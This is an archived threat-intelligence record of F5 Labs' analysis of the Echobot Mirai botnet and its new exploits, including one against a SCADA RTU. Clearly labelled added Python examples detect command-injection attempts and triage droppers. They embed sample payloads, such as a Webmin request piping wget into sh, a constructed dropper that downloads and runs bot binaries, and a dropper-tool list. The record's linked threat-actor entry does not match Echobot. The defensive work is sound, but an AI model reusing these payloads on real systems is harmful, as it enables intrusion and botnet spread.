{
	"id": "28ad47b6-1dee-485a-a1ef-ffbfa07bc1f7",
	"created_at": "2026-04-06T00:14:13.315331Z",
	"updated_at": "2026-04-10T13:12:26.311478Z",
	"deleted_at": null,
	"sha1_hash": "ff4f7774def3c175451d13d9cfeadfc5879e2f5a",
	"title": "Echobot Malware Now up to 71 Exploits, Targeting SCADA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 954785,
	"plain_text": "Echobot Malware Now up to 71 Exploits, Targeting SCADA\r\nBy Authors \u0026 Contributors\r\nArchived: 2026-04-05 23:06:06 UTC\r\nF5 Networks researchers have detected a new variant of the \"Echobot\" malware, which now carries 71 exploits. The authors continue to arm the malware with more exploits, and the threat group behind it continues to expand its operation. The newly added exploits target both old and new vulnerabilities; the new ones target an industrial control system device from Mitsubishi Electric, the Barracuda Spam Firewall, the Citrix NetScaler application delivery controller, video conferencing systems, and additional network and endpoint administration tools.\r\nEarlier this year, Palo Alto Networks [1] reported a new variant from the Mirai malware family, dubbed \"Echobot\" after the file name the malware drops. Initial versions of the malware used 26 exploits to propagate. In August 2019 it was reported [2] to have passed 50 exploits, so at 71 we are seeing substantial growth in Echobot's attack capability.\r\nNew Target: Factory Automation Systems\r\nAlthough the core functionality of this latest variant has not changed much since inception, the addition of a variety of new exploits puts new systems into its crosshairs.\r\nWhile most Mirai variants target IoT devices such as home routers and IP cameras, this version of Echobot adds a notable exploit for CVE-2019-14927, which targets Mitsubishi Electric's smartRTU Remote Terminal Unit (RTU).\r\nThe Mitsubishi RTU [3] is an industrial controller with remote access, used to communicate with SCADA systems in the oil and gas industry, the power industry, and others. Industrial control systems have seen an increase in attacks over the past years [4], including some chilling suggestions of possible cyber-terrorism attacks [5]. 
However, it is uncommon for general-purpose botnets like Mirai to include exploits targeting a specific component such as the Mitsubishi RTU. Figure 1 below shows the product web page for the Mitsubishi smartRTU. While industrial controller systems are essential components responsible for running critical infrastructure, they were never designed to be Internet-connected and are therefore notorious for security flaws. Echobot leverages that weakness, making it more dangerous than before.\r\nhttps://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits--targeting-scada\r\nPage 1 of 7\r\nFigure 1. Web page for the Mitsubishi smartRTU\r\nIn September 2019, the U.S. Department of Homeland Security issued an alert [6], shown in Figure 2, to address the Mitsubishi RTU vulnerability. The alert followed the publication of a proof-of-concept exploit by a researcher known as @xerubus [7], who discovered and responsibly reported this vulnerability.\r\nFigure 2. Department of Homeland Security vulnerability alert page\r\nIndustrial control systems are known to be very difficult to patch because of the risk involved in introducing configuration changes to critical infrastructure systems. This means a longer vulnerability exposure window than in traditional IT systems, which gives attackers a much larger opportunity to exploit new vulnerabilities.\r\nAnalysis of the Exploits\r\nIn the beginning, Echobot consisted of a very odd mix of exploits [8]. Initial Mirai variants targeted IoT devices such as home routers, digital surveillance cameras, and cable modems. Over time, the targets extended to smart devices and web servers. 
Echobot is a very prominent variant in the Mirai landscape, adding to its prey corporate network devices, network and enterprise management systems, video conferencing, voice over IP, and iris recognition platforms (as shown in Figure 3). This new Echobot variant builds on that with similar newer systems, while also adding an old exploit for the Barracuda Spam Firewall and one for the Citrix NetScaler application delivery controller.\r\nFigure 3. Iris ID, an Echobot target\r\nOften, Mirai variants add relatively current exploits to improve their chances of recruiting devices. This version, however, also leverages an exploit from 2003 targeting the online payment platform CCBill. At the same time, Echobot added four exploits from 2019 to its arsenal, the latest of which is from August 2019 and targets the Webmin Linux/Unix administration panel (CVE-2019-15107). This indicates the authors are looking to exploit both legacy and new systems that have fallen through the cracks of a patch management program. 
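\r\nMost of these exploits share one request shape: an attacker-controlled parameter whose value reaches a shell. As an added example (not code from the F5 Labs article and not Echobot's own payloads), the Python script below scans web access-log lines and request bodies for that pattern, flagging a parameter only when its decoded value both breaks out of a command (a semicolon, pipe, double ampersand, backtick or dollar-paren) and names a tool a dropper stage would run. The log lines, bodies, hosts, paths and parameter names in it are constructed for illustration and are assumptions, not captured traffic; values are decoded twice so that double-encoded payloads are caught.\r\n

```python
'''Flag OS command-injection attempts in web access logs.

Added example, not part of the F5 Labs article and not Echobot code. The
log lines and request bodies below are constructed for illustration;
the hosts, paths and parameter names are assumptions, not captured traffic.
'''
from urllib.parse import unquote_plus, urlsplit

Q = chr(34)  # the double-quote character, kept out of the literals below

# Tokens that end one shell command and start another, or substitute one
SHELL_BREAKS = (';', '|', '&&', '`', '$(', chr(10))
# Tools a first-stage dropper typically invokes on a freshly compromised host
DROPPER_TOOLS = ('wget', 'curl', 'tftp', 'busybox', 'chmod', 'sh', 'bash',
                 'nc', 'id', 'uname', 'cat')


def parse_log_line(line):
    '''Parse a combined-log-format line into (ip, method, target, status); None if malformed.'''
    try:
        ip = line.split(' ', 1)[0]
        request = line.split(Q)[1]              # text between the first pair of quotes
        method, target, _proto = request.split(' ')
        status = line.split(Q)[2].split()[0]
        return ip, method, target, status
    except (IndexError, ValueError):
        return None


def decode_params(encoded):
    '''Split a query string or form body into (name, value) pairs.

    Values are decoded twice so a double-encoded payload (%257C -> %7C -> |)
    is seen the way the target application would see it after its own decode.
    '''
    pairs = []
    for chunk in encoded.split('&'):
        if not chunk:
            continue
        name, _, value = chunk.partition('=')
        pairs.append((unquote_plus(name), unquote_plus(unquote_plus(value))))
    return pairs


def words(value):
    '''Tokenise on whitespace and shell punctuation so that ;id yields id.'''
    text = value
    for sep in SHELL_BREAKS + ('(', ')', '{', '}', '>', '<', '/', '='):
        text = text.replace(sep, ' ')
    return text.split()


def injected_tool(value):
    '''Return the first dropper tool named in value if value also breaks out of a command.'''
    if not any(token in value for token in SHELL_BREAKS):
        return None
    for word in words(value):
        if word.lower() in DROPPER_TOOLS:
            return word.lower()
    return None


def scan(requests):
    '''requests: iterable of (access_log_line, request_body). Returns a list of findings.'''
    findings = []
    for line, body in requests:
        parsed = parse_log_line(line)
        if parsed is None:
            continue
        ip, method, target, _status = parsed
        parts = urlsplit(target)
        for name, value in decode_params(parts.query) + decode_params(body):
            tool = injected_tool(value)
            if tool:
                findings.append({'ip': ip, 'method': method, 'path': parts.path,
                                 'param': name, 'tool': tool, 'value': value})
    return findings


def log_line(ip, ts, request, status, size):
    '''Assemble a combined-log-format line: ip - - [ts] <request> status size.'''
    return ip + ' - - [' + ts + '] ' + Q + request + Q + ' ' + str(status) + ' ' + str(size)


# Constructed sample traffic (placeholder addresses from the TEST-NET ranges)
SAMPLE_REQUESTS = [
    # Webmin-style password_change.cgi request carrying a piped command in the old parameter
    (log_line('203.0.113.5', '10/Dec/2019:14:02:11 +0000', 'POST /password_change.cgi HTTP/1.1', 500, 312),
     'user=root&pam=&expired=2&old=test|wget%20http://198.51.100.7/richard%20-O%20/tmp/r;sh%20/tmp/r&new1=x&new2=x'),
    # sar2html-style GET with a command appended to the plot parameter
    (log_line('203.0.113.5', '10/Dec/2019:14:02:15 +0000', 'GET /sar2HTML/index.php?plot=;id HTTP/1.1', 200, 1044), ''),
    # Ordinary traffic
    (log_line('198.51.100.23', '10/Dec/2019:14:03:01 +0000', 'GET /index.php?page=home&id=42 HTTP/1.1', 200, 5120), ''),
    # A tool name alone, with no command separator, is not an injection
    (log_line('198.51.100.23', '10/Dec/2019:14:03:09 +0000', 'GET /search?q=bash+scripting+tips HTTP/1.1', 200, 2210), ''),
    # Double-encoded pipe and space (%257C, %2520), a common way past a single-decode filter
    (log_line('203.0.113.5', '10/Dec/2019:14:04:40 +0000',
              'GET /cgi-bin/status.cgi?host=10.0.0.1%257Cwget%2520http://198.51.100.7/r HTTP/1.1', 200, 88), ''),
]

if __name__ == '__main__':
    for f in scan(SAMPLE_REQUESTS):
        print(f['ip'], f['method'], f['path'], 'param=' + f['param'], 'tool=' + f['tool'])
```

\r\nFeed it (line, body) pairs from a reverse proxy or WAF that logs request bodies; with plain access logs only the query string is inspected, so POST-based exploits such as the Webmin one are only visible when the body is captured. The two-signal rule (separator plus tool name) keeps ordinary search terms from firing, at the cost of missing payloads that use a tool outside DROPPER_TOOLS.\r\n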
The newly added exploits to Echobot are listed in Table 1 as well as in Figure 4:\r\nExploit Name | CVE | Targeted System\r\nACTi ASOC 2200 Web Configurator RCE | Unassigned (2011) | Video surveillance\r\nAVCON6 systems management platform - OGNL Remote Command Execution | Unassigned (2018) | Video conferencing system\r\nBarracuda Spam Firewall 3.3.x - 'preview_email.cgi?file' Arbitrary File Access | CVE-2006-4000 | Firewall\r\nCCBILL CGI - 'ccbillx.c' 'whereami.cgi' Remote Code Execution | Unassigned (2003) | Online payment platform\r\nEnigma NMS 65.0.0 OS Command Injection | CVE-2019-16072 | Enterprise network management software\r\nNetGain Enterprise Manager Command Injection | CVE-2017-16608 | IT infrastructure monitoring\r\nCitrix/NetScaler SD-WAN 9.1.2.26.561201 - Command Injection | CVE-2017-6316 | Application delivery controller\r\n3Com OfficeConnect - Code Execution | Unassigned (2009) | Router\r\nRuby on Rails - Dynamic Render File Upload / Remote Code Execution | CVE-2016-0752 | Web application\r\nSar2HTML 3.2.1 - Remote Command Execution | Unassigned (2019) | Linux/Unix performance monitoring\r\nMitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated OS Command Injection Bind Shell | CVE-2019-14927 | Remote Terminal Unit based monitoring and control\r\nThomson Reuters Velocity Analytics Remote Code Injection | CVE-2013-5912 | Analytics platform\r\nWebmin RCE \u003c=1.920 | CVE-2019-15107 | Linux/Unix administration system\r\nYachtcontrol Webapplication 1.0 - Unauthenticated Remote Code Execution | CVE-2019-17270 | Yachtcontrol web servers\r\nTechnicolor TD5130v2 / Technicolor TD5336 | CVE-2019-18396, CVE-2017-14127 | Router\r\nTable 1. New exploits used by the latest version of Echobot\r\nFigure 4. All of the exploits in the malware code\r\nAttack Infrastructure\r\nEchobot uses its arsenal to spread a dropper, a bash script named \"Richard,\" detailed in Figure 5. The dropper instructs the compromised system to download Echobot and execute it, in builds for no fewer than 13 different processor architectures. The hacked servers are then used to host and spread more malware to new targets, adding more machines to the botnet.\r\nFigure 5. The dropper \"Richard's\" payload, a bash script\r\nThe Echobot malware itself is hosted on a different server than previously reported. The hosting server is now a hacked Unraid network attached storage (NAS) system that is completely exposed, allowing anyone to gain full admin access through a user-friendly GUI terminal.\r\nNot surprisingly, this server was taken over by malicious actors, although exactly how it was compromised is unknown. It appears that SSH and Telnet services are exposed without any password required, and Mirai is known for its credential brute-force capability, so this is the likely entry point.\r\nReviewing the files on that system, seen in Figure 6, it seems that the attackers only recently (12/10/2019) uploaded the new malware variant to the hacked server:\r\nFigure 6. New malware variant added to the hacked server\r\nThe other attacking Echobot IPs appear to be infected web servers, mostly located in the U.S. and in Europe. Half of those servers are hosted on DreamHost. An example of an infected web server is shown in Figure 7. 
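\r\nA dropper of the kind described above is easy to triage automatically. The Python script below is an added example, not the \"Richard\" script or any code from the article: it splits a Mirai-style shell dropper into individual commands and pulls out the working directories it tries, the download URLs and hosts, the binaries it executes (one per architecture) and whether it deletes them afterwards. The dropper text it parses is constructed to follow that pattern; the host 198.51.100.7, the bot.<arch> file names and the tftp -g -r FILE HOST form are assumptions.\r\n

```python
'''Triage a Mirai-style shell dropper and extract its infrastructure.

Added example, not part of the F5 Labs article and not the real Richard
script. SAMPLE_DROPPER is constructed to mirror the pattern the article
describes; 198.51.100.7 and the bot.<arch> names are placeholders.
'''
from urllib.parse import urlsplit

SAMPLE_DROPPER = '''#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://198.51.100.7/bins/bot.x86 -O bot.x86; chmod +x bot.x86; ./bot.x86 webmin; rm -rf bot.x86
wget http://198.51.100.7/bins/bot.mips -O bot.mips; chmod +x bot.mips; ./bot.mips webmin; rm -rf bot.mips
curl -s http://198.51.100.7/bins/bot.arm7 -o bot.arm7; chmod 777 bot.arm7; ./bot.arm7 webmin; rm -rf bot.arm7
tftp -g -r bot.mpsl 198.51.100.7; chmod 777 bot.mpsl; ./bot.mpsl webmin; rm -rf bot.mpsl
'''


def commands(script):
    '''Yield each shell command as an argv list: split lines on && || ; | and skip comments.'''
    for line in script.splitlines():
        line = line.strip()
        if not line or line.startswith('#'):
            continue
        for sep in ('&&', '||', ';', '|'):      # longest separators first
            line = line.replace(sep, chr(10))
        for cmd in line.split(chr(10)):
            cmd = cmd.strip()
            if cmd:
                yield cmd.split()


def triage(script):
    '''Summarise where the dropper writes, what it fetches, what it runs and whether it cleans up.'''
    dirs, urls, executed = [], [], []
    deletes_payload = False
    for argv in commands(script):
        tool, args = argv[0], argv[1:]
        if tool == 'cd' and args:
            dirs.append(args[0])                 # fallback chain of writable directories
        elif tool in ('wget', 'curl'):
            urls.extend(a for a in args if a.startswith(('http://', 'https://', 'ftp://')))
        elif tool == 'tftp' and '-r' in args:
            # tftp -g -r FILE HOST : the host is the last positional argument
            urls.append('tftp://' + args[-1] + '/' + args[args.index('-r') + 1])
        elif tool.startswith('./'):
            executed.append(tool[2:])            # one binary per CPU architecture
        elif tool == 'rm' and any(name in args for name in executed):
            deletes_payload = True               # anti-forensics: payload removed after launch
    hosts = sorted({urlsplit(u).hostname for u in urls if urlsplit(u).hostname})
    archs = sorted({name.rsplit('.', 1)[-1] for name in executed if '.' in name})
    return {'dirs': dirs, 'urls': urls, 'hosts': hosts, 'executed': executed,
            'archs': archs, 'deletes_payload': deletes_payload}


def iocs(summary):
    '''Flat list of indicators to block or hunt for: hosting hosts and full download URLs.'''
    return summary['hosts'] + summary['urls']


if __name__ == '__main__':
    result = triage(SAMPLE_DROPPER)
    print(len(result['archs']), 'architectures:', ', '.join(result['archs']))
    for indicator in iocs(result):
        print('ioc', indicator)
```

\r\nThe architecture count is itself a useful triage signal: a script that fetches the same base name with a dozen suffixes and runs each one is almost always a botnet dropper, whatever the binaries are called. The hosts it yields are the malware-hosting servers the article describes (in the real case, the hacked NAS), which are the first thing to block and the first place to look for other victims.\r\n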
The services running on those servers are not vectors in the malware's arsenal, so they were most likely brute-forced to gain control of them.\r\nFigure 7. A typical example of an attacking server infected with Echobot\r\nConclusion\r\nMirai has been around for a few years now, and variants of the original malware have been used all over the world to create botnets. F5 Labs recently wrote in its ongoing \"Hunt for IoT\" research series that devices are so easy to compromise, preteens are doing it. There is no sign that IoT botnets will disappear anytime soon, and we expect new variants to keep appearing. Echobot remains a threat, and the expanding scope of its exploits indicates it will not be slowing down anytime soon. Echobot's shift toward factory automation is notable and may indicate a future direction for botnet-building threat actors.\r\nTo keep the threat at bay, enterprises should consider implementing a patch management system in order to mitigate the risk of vulnerable systems on their networks.\r\nSecurity Controls\r\nEnterprises should consider implementing the following security controls based on their specific circumstances:\r\nSource: https://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits--targeting-scada",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits--targeting-scada"
	],
	"report_names": [
		"echobot-malware-now-up-to-71-exploits--targeting-scada"
	],
	"threat_actors": [
		{
			"id": "77b28afd-8187-4917-a453-1d5a279cb5e4",
			"created_at": "2022-10-25T15:50:23.768278Z",
			"updated_at": "2026-04-10T02:00:05.266635Z",
			"deleted_at": null,
			"main_name": "Inception",
			"aliases": [
				"Inception Framework",
				"Cloud Atlas"
			],
			"source_name": "MITRE:Inception",
			"tools": [
				"PowerShower",
				"VBShower",
				"LaZagne"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434453,
	"ts_updated_at": 1775826746,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ff4f7774def3c175451d13d9cfeadfc5879e2f5a.pdf",
		"text": "https://archive.orkl.eu/ff4f7774def3c175451d13d9cfeadfc5879e2f5a.txt",
		"img": "https://archive.orkl.eu/ff4f7774def3c175451d13d9cfeadfc5879e2f5a.jpg"
	}
}